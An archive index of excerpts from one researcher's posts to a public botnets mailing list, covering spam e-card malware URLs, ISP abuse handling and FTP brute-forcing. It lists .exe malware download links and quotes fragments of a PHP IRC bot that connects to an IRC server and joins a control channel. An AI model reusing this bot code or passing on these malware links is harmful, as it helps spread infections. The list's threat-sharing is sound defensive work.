Re: [botnets] Another bogus greeting card spamming a malware URL

2008-08-28 Thread James Pleger
/e-card.exe 404/Error Pages: http://kkvtombeek.be/e-card.exe 404/Error Pages: http://leschevaliersdemines.be/e-card.exe 404/Error Pages: http://riccoboniholding.com/e-card.exe 404/Error Pages: http://www.mylady.st/e-card.exe James Pleger e: [EMAIL PROTECTED] On Wed, Aug 27, 2008 at 6:02 PM, Gadi

Re: [botnets] reviving this list, allowing sharing

2008-08-27 Thread James Pleger
I think that is a bit too high volume for this list, maybe throwing honeypot logs to an aggregator and then sending a daily digest would be more appropriate. James Pleger e: [EMAIL PROTECTED] On Wed, Aug 27, 2008 at 6:10 PM, Jeremy [EMAIL PROTECTED] wrote: I propose that each and every one

Re: [botnets] Spam botnet discovered

2007-11-05 Thread James Pleger
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] --Yea, he is... I think the main reason for that is that this list is public and is archived by mailing list archives. When google picks up those sites, they index the data and that is generally not a good thing. I hope you

Re: [botnets] mac trojan in-the-wild

2007-11-04 Thread James Pleger
information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets -- James Pleger p: 623.298.7966 e: [EMAIL PROTECTED] ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All

Re: [botnets] the heart of the problem [was: RE: mac trojan in-the-wild]

2007-11-01 Thread James Pleger
in popularity of linux on desktops, as well as very cheap linux PC's. I imagine we will have a similar flood of threads, and media hype about that aswell. Just my two cents... and this may not have made any sense, as I am very tired right now... --James Pleger On 11/1/07, Gadi Evron [EMAIL

Re: [botnets] FTP attack seen on echnaton.serveftp.com

2007-10-06 Thread James Pleger
-- James Pleger p: 623.298.7966 e: [EMAIL PROTECTED] ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman

Re: [botnets] FTP attack seen on echnaton.serveftp.com

2007-10-06 Thread James Pleger
are doing it. Just my 2 cents. On 10/6/07, Mr. X [EMAIL PROTECTED] wrote: On 10/6/07, James Pleger [EMAIL PROTECTED] wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- This looks like standard ftp bruteforcing... Typical targets of this attacks are MS FTP Servers

Re: [botnets] Why ISP's and NSP's Love Botnets

2007-09-21 Thread James Pleger
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] --I don't think that ISPs are going to care until there is a business model that will make them money(or save it) and not cost them a bunch of money/staff overhead. It costs a great deal to staff an abuse department that knows

Re: [botnets] Alternative Botnet CCs - free chapter from Botnets:The Killer Web App

2007-07-25 Thread James Pleger
://www.whitestar.linuxbox.org/mailman/listinfo/botnets -- James Pleger p: 623.298.7966 e: [EMAIL PROTECTED] ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon

Re: [botnets] [Dshield] ISP redirecting IRC traffic to attempt bot removal (fwd)

2007-07-20 Thread James Pleger
(brochure code ISC) ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets -- James Pleger p

Re: [botnets] Another botnet on eu.undernet.org

2007-03-21 Thread James Pleger
00,999); $me = randomkeys(5).rand(100,999); $ircname = randomkeys(4).rand(100,999); $version = "TeaMrx v1.0"; $server = "eu.undernet.org"; $quitmsg = "xeQt vS TeaMrx"; $chan = "#vx8"; $port = '6667'; while(0==0) { $ircsock = @fsockopen($server, $port); Ja

Re: [botnets] Another botnet on eu.undernet.org

2007-03-21 Thread James Pleger
1] \r\n"); } if( $buffer[1] == '001') { fputs($ircsock,"JOIN $chan\r\n"); fputs($ircsock,"WHO $me\r\n"); } if( $buffer[7]." ".$buffer[8]." ".$buffer[9]." ".$buffer[10] == 'many connections from your' ) { exit; } if( $buffer[1

Re: [botnets] defacements for the installation of malcode (Gadi Evron)

2007-02-21 Thread James Pleger
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- What I have seen is that a good majority of the CC's are running on dedicated hosts that might have been set up fraudulently, or that have been compromised. As far as the clients of these CC's it really depends on what the